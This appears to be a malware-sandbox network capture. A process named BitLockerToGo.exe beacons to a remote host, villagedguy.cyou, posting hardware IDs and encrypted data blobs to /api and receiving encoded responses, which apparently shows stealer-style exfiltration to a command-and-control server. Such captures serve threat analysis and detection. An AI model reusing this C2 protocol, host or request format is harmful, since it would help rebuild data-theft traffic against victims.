                                                                                                                                                                        2024-10-31 00:05:24 UTC75OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 33 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--3&j=5c9b8674a630d9101b46733aa37f15ec
                                                                                                                                                                        2024-10-31 00:05:24 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 31 Oct 2024 00:05:24 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=l2e632l2203gccr19c2732i0cg; expires=Sun, 23-Feb-2025 17:52:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lj5w6Fe31qNxMm5vClSVnolpPtwOw%2B9C82z%2FSdkJ8zYP9W4IS9KJ3YwtRY%2BEZzyX9xR4a65CesGPkEeCCDssS%2BjiJPKVQVMvrctBIOBCqZ%2Bp72leXb0cfiUPhOeP9JBc0Qho"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8daf64abd8dac872-DFW
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2223&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=975&delivery_rate=1280282&cwnd=252&unsent_bytes=0&cid=ebbc1ebcf84cd70d&ts=451&x=0"
                                                                                                                                                                        2024-10-31 00:05:24 UTC358INData Raw: 32 64 62 31 0d 0a 62 42 49 37 34 55 30 76 6e 4f 47 31 53 56 6c 41 6e 58 53 47 37 67 35 52 61 48 34 56 71 38 67 70 35 75 54 50 6d 4e 6f 38 64 35 73 58 4d 45 33 44 64 78 75 77 77 38 59 73 65 33 72 37 46 65 71 64 61 33 31 4b 48 33 47 4a 38 6b 2b 48 69 4c 7a 39 39 68 34 42 39 6b 34 6f 58 59 41 68 58 50 6e 4e 6c 79 77 68 59 71 63 76 2f 63 78 72 50 30 70 45 4e 38 36 69 53 34 65 49 72 66 6d 78 55 77 66 33 44 33 70 58 68 69 56 4b 2f 34 58 55 4a 54 51 6c 2b 42 48 6e 68 47 41 34 42 52 5a 34 69 65 51 4c 67 35 37 74 6f 76 68 78 45 75 38 4e 58 31 71 53 4a 67 33 68 7a 63 35 72 50 43 36 2f 54 71 53 50 61 7a 4d 45 47 48 48 41 6f 45 47 4f 67 4b 7a 38 73 45 77 65 2f 51 52 36 57 59 55 6b 51 50 61 52 32 53 38 7a 4c 76 34 62 35 38 77 69 63 77 30 45 4e 35 48 71 47 4c 61 46 76
                                                                                                                                                                        Data Ascii: 2db1bBI74U0vnOG1SVlAnXSG7g5RaH4Vq8gp5uTPmNo8d5sXME3Ddxuww8Yse3r7Feqda31KH3GJ8k+HiLz99h4B9k4oXYAhXPnNlywhYqcv/cxrP0pEN86iS4eIrfmxUwf3D3pXhiVK/4XUJTQl+BHnhGA4BRZ4ieQLg57tovhxEu8NX1qSJg3hzc5rPC6/TqSPazMEGHHAoEGOgKz8sEwe/QR6WYUkQPaR2S8zLv4b58wicw0EN5HqGLaFv
                                                                                                                                                                        2024-10-31 00:05:24 UTC1369INData Raw: 78 53 4d 77 4b 66 6f 45 37 34 56 68 50 67 6f 52 66 63 61 70 53 34 4f 4d 70 2f 57 79 57 68 6a 30 43 48 42 5a 77 32 45 4e 2b 5a 75 58 63 33 73 42 2b 67 62 6a 67 48 70 78 4d 46 78 6f 68 37 4d 4c 67 34 72 74 6f 76 68 57 45 50 6f 4e 65 31 61 41 4a 30 62 73 67 38 55 74 4e 69 66 74 45 4f 47 43 5a 6a 41 59 46 6e 6e 50 71 55 4b 50 6a 36 6a 39 76 42 35 62 75 51 6c 6f 47 64 74 76 62 50 4f 49 32 79 45 73 49 72 38 4a 71 70 55 73 4e 41 5a 63 4c 34 6d 75 53 6f 43 48 71 66 53 32 57 68 6e 2f 41 48 31 57 68 53 56 4e 2b 59 6e 66 49 7a 6f 76 39 42 6e 6b 69 57 45 33 44 42 42 32 7a 4f 6f 46 78 49 47 31 75 75 41 65 4f 2f 34 4e 59 68 75 32 4c 45 50 77 68 4d 46 72 4a 47 7a 6d 56 75 4f 41 4c 47 74 4b 45 6e 4c 47 75 45 71 57 67 36 50 6f 74 46 73 54 39 41 31 2b 57 59 59 6f 51 50 43
                                                                                                                                                                        Data Ascii: xSMwKfoE74VhPgoRfcapS4OMp/WyWhj0CHBZw2EN+ZuXc3sB+gbjgHpxMFxoh7MLg4rtovhWEPoNe1aAJ0bsg8UtNiftEOGCZjAYFnnPqUKPj6j9vB5buQloGdtvbPOI2yEsIr8JqpUsNAZcL4muSoCHqfS2Whn/AH1WhSVN+YnfIzov9BnkiWE3DBB2zOoFxIG1uuAeO/4NYhu2LEPwhMFrJGzmVuOALGtKEnLGuEqWg6PotFsT9A1+WYYoQPC
                                                                                                                                                                        2024-10-31 00:05:24 UTC1369INData Raw: 47 7a 6d 56 75 4f 41 4c 47 74 4b 45 48 37 4a 6f 55 47 41 68 71 72 33 76 56 30 53 2b 67 4e 33 55 34 30 6f 53 66 4b 4b 32 69 30 37 4a 66 73 54 39 6f 6c 6c 50 77 5a 63 4f 59 6d 74 55 38 54 65 37 64 57 2f 53 42 62 57 44 57 46 51 77 7a 41 44 35 38 50 51 4a 33 74 36 76 78 48 68 68 47 63 31 41 68 78 6c 7a 4b 52 41 68 59 79 72 2b 37 56 53 45 2f 6b 50 63 46 2b 50 4c 30 72 35 6b 63 55 75 50 54 44 31 56 71 72 4d 61 79 74 4b 52 44 66 2f 75 6c 79 56 6b 4f 2f 50 75 31 41 62 2f 68 67 77 52 73 30 32 44 66 6d 50 6c 33 4e 37 4b 66 38 61 34 34 52 71 4e 77 49 54 65 4d 43 34 53 6f 69 49 76 2f 32 34 56 78 76 32 41 6e 6c 55 68 43 4a 47 39 49 37 54 4c 44 70 69 73 56 62 6a 6c 43 78 72 53 69 70 6e 78 4b 5a 6c 6a 34 71 6b 75 71 63 51 44 4c 6b 4a 66 42 6e 62 62 30 6e 79 69 39 30 6b
                                                                                                                                                                        Data Ascii: GzmVuOALGtKEH7JoUGAhqr3vV0S+gN3U40oSfKK2i07JfsT9ollPwZcOYmtU8Te7dW/SBbWDWFQwzAD58PQJ3t6vxHhhGc1AhxlzKRAhYyr+7VSE/kPcF+PL0r5kcUuPTD1VqrMaytKRDf/ulyVkO/Pu1Ab/hgwRs02DfmPl3N7Kf8a44RqNwITeMC4SoiIv/24Vxv2AnlUhCJG9I7TLDpisVbjlCxrSipnxKZlj4qkuqcQDLkJfBnbb0nyi90k
                                                                                                                                                                        2024-10-31 00:05:24 UTC1369INData Raw: 4c 6a 69 47 6f 38 53 6c 49 33 7a 72 49 4c 33 4d 61 43 33 59 30 63 4e 4d 4e 4f 62 78 65 61 62 30 72 79 77 34 39 72 4e 79 48 7a 48 75 75 4b 5a 54 38 41 46 58 7a 46 6f 55 2b 49 6a 36 6a 38 75 56 73 51 2b 41 70 38 55 34 55 73 54 76 47 4d 32 43 4e 37 62 4c 38 52 2f 4d 77 30 63 79 38 4c 66 4d 65 73 43 35 76 49 74 4c 71 2f 55 6c 57 68 54 6e 78 51 68 53 6c 49 38 6f 4c 52 49 7a 34 71 2b 78 66 69 69 6d 38 38 44 68 6c 32 78 71 35 48 69 6f 79 73 2b 37 52 56 47 76 49 4c 4d 42 66 44 4b 46 57 2b 32 35 63 61 4f 44 54 6f 42 75 6a 4d 63 33 30 54 58 48 44 46 36 68 50 45 68 37 2f 77 73 6c 41 51 39 67 74 7a 56 6f 51 69 53 2f 4b 4a 33 69 4d 39 4c 66 59 45 35 34 42 69 4e 41 51 51 65 63 53 67 53 49 6e 47 34 37 71 2f 52 6c 57 68 54 6c 78 65 6a 67 46 47 38 6f 53 58 4e 48 55 37 76
                                                                                                                                                                        Data Ascii: LjiGo8SlI3zrIL3MaC3Y0cNMNObxeab0ryw49rNyHzHuuKZT8AFXzFoU+Ij6j8uVsQ+Ap8U4UsTvGM2CN7bL8R/Mw0cy8LfMesC5vItLq/UlWhTnxQhSlI8oLRIz4q+xfiim88Dhl2xq5Hioys+7RVGvILMBfDKFW+25caODToBujMc30TXHDF6hPEh7/wslAQ9gtzVoQiS/KJ3iM9LfYE54BiNAQQecSgSInG47q/RlWhTlxejgFG8oSXNHU7v
                                                                                                                                                                        2024-10-31 00:05:24 UTC1369INData Raw: 30 63 31 4a 63 51 63 36 36 57 34 66 45 6e 4f 79 37 53 42 37 30 41 6a 42 47 7a 54 59 4e 2b 59 2b 58 63 33 73 6b 38 42 2f 6e 67 32 30 36 42 68 46 79 77 4b 39 4b 67 6f 4b 6e 38 4c 68 59 45 2f 67 4c 65 6c 71 43 4a 55 54 35 69 39 41 6f 4b 57 4b 78 56 75 4f 55 4c 47 74 4b 4e 58 44 62 70 46 76 45 6d 65 50 6a 2b 46 6b 5a 75 56 59 77 58 59 6b 67 53 66 6d 50 30 53 34 39 4c 2f 34 5a 35 59 78 6a 4e 77 45 56 63 63 69 6e 54 6f 6d 43 76 2f 43 7a 55 52 6e 77 41 6e 30 5a 7a 57 39 4b 35 73 4f 50 61 77 6f 76 38 52 6a 6a 6d 69 77 73 52 41 55 33 7a 71 59 4c 33 4d 61 73 39 72 64 64 47 76 6f 4e 63 56 4f 52 50 55 48 33 69 39 49 6e 4d 43 7a 35 42 4f 4b 44 5a 54 41 4a 46 58 44 42 70 6b 47 48 67 65 32 30 2b 46 6b 4e 75 56 59 77 65 70 51 2f 51 4c 36 63 6d 54 4a 37 4a 66 4e 57 76 4d
                                                                                                                                                                        Data Ascii: 0c1JcQc66W4fEnOy7SB70AjBGzTYN+Y+Xc3sk8B/ng206BhFywK9KgoKn8LhYE/gLelqCJUT5i9AoKWKxVuOULGtKNXDbpFvEmePj+FkZuVYwXYkgSfmP0S49L/4Z5YxjNwEVccinTomCv/CzURnwAn0ZzW9K5sOPawov8RjjmiwsRAU3zqYL3Mas9rddGvoNcVORPUH3i9InMCz5BOKDZTAJFXDBpkGHge20+FkNuVYwepQ/QL6cmTJ7JfNWvM
                                                                                                                                                                        2024-10-31 00:05:24 UTC1369INData Raw: 47 33 4c 4b 70 6b 43 44 68 61 4c 2b 73 56 41 63 39 6b 34 2b 47 59 51 33 44 61 62 44 39 6a 41 34 4c 76 4a 57 2b 38 4a 31 63 77 30 51 4e 35 48 71 52 34 71 44 72 66 43 2b 57 68 44 2f 42 48 56 5a 69 43 78 43 2b 6f 58 54 4a 44 73 70 39 68 66 69 69 57 59 34 44 42 46 30 7a 36 77 4c 79 73 61 71 34 76 67 47 56 64 6b 56 66 56 57 45 62 31 4b 77 6d 70 63 73 4e 32 4b 6e 56 75 2b 41 61 44 51 4b 45 58 54 42 72 30 2b 4f 67 36 33 79 71 6c 59 56 2f 68 78 69 57 59 6f 71 51 66 32 44 30 79 30 79 4a 50 77 53 70 4d 49 73 4e 42 4a 63 4c 34 6d 48 52 34 4f 76 71 75 48 34 51 56 76 67 54 6e 64 56 77 33 63 4e 2f 34 6a 64 4a 44 59 68 2b 52 58 76 69 57 59 79 44 52 52 36 32 36 6c 45 69 34 4b 74 39 62 35 59 46 50 59 49 64 31 43 43 4a 30 71 2b 7a 5a 63 73 49 32 4b 6e 56 73 71 4c 62 7a 64
                                                                                                                                                                        Data Ascii: G3LKpkCDhaL+sVAc9k4+GYQ3DabD9jA4LvJW+8J1cw0QN5HqR4qDrfC+WhD/BHVZiCxC+oXTJDsp9hfiiWY4DBF0z6wLysaq4vgGVdkVfVWEb1KwmpcsN2KnVu+AaDQKEXTBr0+Og63yqlYV/hxiWYoqQf2D0y0yJPwSpMIsNBJcL4mHR4OvquH4QVvgTndVw3cN/4jdJDYh+RXviWYyDRR626lEi4Kt9b5YFPYId1CCJ0q+zZcsI2KnVsqLbzd
                                                                                                                                                                        2024-10-31 00:05:24 UTC1369INData Raw: 4b 6c 46 69 6f 47 37 36 2f 56 35 44 2f 51 49 5a 30 6a 44 59 51 33 34 77 34 39 37 64 57 4c 37 42 36 54 55 50 47 46 52 53 53 53 65 2b 68 6d 62 79 4c 53 36 72 68 35 4e 71 30 41 77 53 38 4e 33 44 62 6d 41 78 54 6b 39 49 65 6b 56 6f 37 4a 53 48 51 30 61 63 73 36 36 43 61 71 4e 75 66 33 34 45 46 58 32 54 69 68 67 77 32 63 4e 77 63 32 58 4d 33 74 36 76 79 50 6e 67 6d 49 30 48 41 30 36 35 36 31 4e 67 59 47 39 75 4a 5a 56 41 66 35 4f 50 68 6d 46 62 78 57 75 7a 5a 63 76 4b 6d 4b 6e 52 72 62 58 4f 57 42 64 54 43 58 57 35 46 4c 45 6b 4f 32 69 36 68 42 56 36 30 34 6f 47 63 51 73 58 2b 79 46 31 44 30 34 5a 63 45 6f 35 35 70 68 50 41 45 64 53 66 65 45 52 6f 57 46 6f 37 69 4a 53 42 6a 70 44 58 56 65 76 52 46 44 2b 5a 66 51 4a 54 30 69 76 31 69 6b 67 79 78 72 4d 31 77 2f
                                                                                                                                                                        Data Ascii: KlFioG76/V5D/QIZ0jDYQ34w497dWL7B6TUPGFRSSSe+hmbyLS6rh5Nq0AwS8N3DbmAxTk9IekVo7JSHQ0acs66CaqNuf34EFX2Tihgw2cNwc2XM3t6vyPngmI0HA06561NgYG9uJZVAf5OPhmFbxWuzZcvKmKnRrbXOWBdTCXW5FLEkO2i6hBV604oGcQsX+yF1D04ZcEo55phPAEdSfeERoWFo7iJSBjpDXVevRFD+ZfQJT0iv1ikgyxrM1w/
                                                                                                                                                                        2024-10-31 00:05:24 UTC1369INData Raw: 7a 57 2f 36 48 74 44 55 4b 70 58 47 38 58 6d 6d 39 62 76 74 75 46 5a 58 73 77 76 30 36 6b 79 32 38 68 47 42 70 30 33 36 6b 4d 75 72 69 4b 39 4c 39 66 41 2b 6b 44 66 48 69 41 50 6b 66 41 76 63 49 6f 4e 53 7a 34 41 50 58 4d 49 6e 4d 46 58 43 2f 77 36 67 50 45 75 65 4f 36 6f 42 35 4e 75 54 74 7a 56 34 30 6f 57 2b 2f 4f 38 43 55 38 49 2b 6b 47 36 59 42 4e 4d 42 73 57 4e 34 66 71 54 63 54 65 2f 37 54 34 57 67 53 35 56 69 41 4c 32 48 6f 65 71 64 4f 46 4e 48 55 37 76 77 43 6b 31 44 35 39 53 67 34 33 6b 65 6f 4d 68 35 53 2f 2f 4c 74 49 46 72 34 77 54 6e 79 55 4c 46 33 34 67 4f 6b 56 45 43 37 35 45 66 36 4c 61 68 55 71 58 44 6d 4a 70 51 76 63 76 2b 32 79 2b 47 46 62 75 52 59 77 41 63 4d 61 54 76 43 4e 30 44 30 71 62 39 6f 42 35 35 78 71 4d 45 70 53 4e 38 2f 71 45
                                                                                                                                                                        Data Ascii: zW/6HtDUKpXG8Xmm9bvtuFZXswv06ky28hGBp036kMuriK9L9fA+kDfHiAPkfAvcIoNSz4APXMInMFXC/w6gPEueO6oB5NuTtzV40oW+/O8CU8I+kG6YBNMBsWN4fqTcTe/7T4WgS5ViAL2HoeqdOFNHU7vwCk1D59Sg43keoMh5S//LtIFr4wTnyULF34gOkVEC75Ef6LahUqXDmJpQvcv+2y+GFbuRYwAcMaTvCN0D0qb9oB55xqMEpSN8/qE
                                                                                                                                                                        2024-10-31 00:05:24 UTC1369INData Raw: 30 2b 45 78 56 6f 55 34 33 56 34 34 75 54 76 43 41 78 54 6b 39 49 65 6b 56 6f 37 4a 53 48 41 45 64 5a 38 53 37 52 6f 43 51 6b 38 53 66 57 42 44 2b 4d 45 35 75 6b 69 68 64 76 4b 58 55 50 54 68 69 73 56 62 38 7a 44 52 7a 4c 52 70 79 7a 75 6f 46 78 49 4c 74 6f 76 68 78 48 76 67 65 66 55 69 4f 4b 31 75 38 70 4e 45 75 50 47 4b 78 56 75 6a 4d 4e 48 4d 46 44 58 44 50 72 30 7a 49 67 62 66 39 2b 42 42 56 39 30 34 6f 47 59 77 2b 53 76 69 47 30 47 63 39 4c 50 46 57 2b 38 4a 31 63 78 78 63 4c 35 72 6b 43 35 62 47 39 62 72 2f 55 42 6a 34 44 58 35 61 6b 54 31 4c 2f 5a 58 55 62 41 55 63 33 77 62 6e 6d 47 73 43 42 78 68 68 33 4b 6c 62 67 37 69 54 32 71 68 64 41 66 35 42 55 45 6d 4f 4f 6c 7a 35 6b 2b 6b 56 44 44 50 34 42 71 61 71 62 79 55 4a 58 44 6d 4a 73 67 76 63 78 6f
                                                                                                                                                                        Data Ascii: 0+ExVoU43V44uTvCAxTk9IekVo7JSHAEdZ8S7RoCQk8SfWBD+ME5ukihdvKXUPThisVb8zDRzLRpyzuoFxILtovhxHvgefUiOK1u8pNEuPGKxVujMNHMFDXDPr0zIgbf9+BBV904oGYw+SviG0Gc9LPFW+8J1cxxcL5rkC5bG9br/UBj4DX5akT1L/ZXUbAUc3wbnmGsCBxhh3Klbg7iT2qhdAf5BUEmOOlz5k+kVDDP4BqaqbyUJXDmJsgvcxo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.449739104.21.32.1964432676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-31 00:05:25 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 18159
                                                                                                                                                                        Host: villagedguy.cyou
                                                                                                                                                                        2024-10-31 00:05:25 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5E550C58F802B17BB818A83A1A3BD1B5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--3--
                                                                                                                                                                        2024-10-31 00:05:25 UTC2828OUTData Raw: f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af
                                                                                                                                                                        Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                                                                                                                        2024-10-31 00:05:26 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 31 Oct 2024 00:05:26 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=auo0ol4b1h942q8k2fvlmspfnf; expires=Sun, 23-Feb-2025 17:52:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYRqf5jtzG6uFgOAp%2Bj25M8T03u7Nkkm%2FOEmtv5PUtJYevVbAFPgwq0UQZaARtgZixDyP30qSHS0VYDEGhPPeuf5bUu%2FA3eCip41nAADMPkiCEukG4Y8d4rPEaff1CTbLql%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8daf64b57cbb7d57-DFW
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1823&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2837&recv_bytes=19121&delivery_rate=1250431&cwnd=251&unsent_bytes=0&cid=567f16e973b4d760&ts=589&x=0"
                                                                                                                                                                        2024-10-31 00:05:26 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                                                                                                                        Data Ascii: 11ok 173.254.250.78
                                                                                                                                                                        2024-10-31 00:05:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.449740104.21.32.1964432676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-31 00:05:27 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 8780
                                                                                                                                                                        Host: villagedguy.cyou
                                                                                                                                                                        2024-10-31 00:05:27 UTC8780OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5E550C58F802B17BB818A83A1A3BD1B5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--3--
                                                                                                                                                                        2024-10-31 00:05:27 UTC1009INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 31 Oct 2024 00:05:27 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=pmai34repfp50bo3snlqpdtkv1; expires=Sun, 23-Feb-2025 17:52:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6sIeBG8uORG8t5%2BYxquB%2Boti4rZSbNsQAIiShaY3euWWd16zUKCPXGRh5GxdLYEypiqhAig2cU1PVt0sh5jLoW%2ButaZpL4ahc5rPkC0MoE3KpdemXMCLcC5NRigCgY8quUfE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8daf64bdb86ce7cf-DFW
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1427&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9719&delivery_rate=1978142&cwnd=251&unsent_bytes=0&cid=e454f39c4d69337e&ts=715&x=0"
                                                                                                                                                                        2024-10-31 00:05:27 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                                                                                                                        Data Ascii: 11ok 173.254.250.78
                                                                                                                                                                        2024-10-31 00:05:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.449741104.21.32.1964432676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-31 00:05:28 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 20433
                                                                                                                                                                        Host: villagedguy.cyou
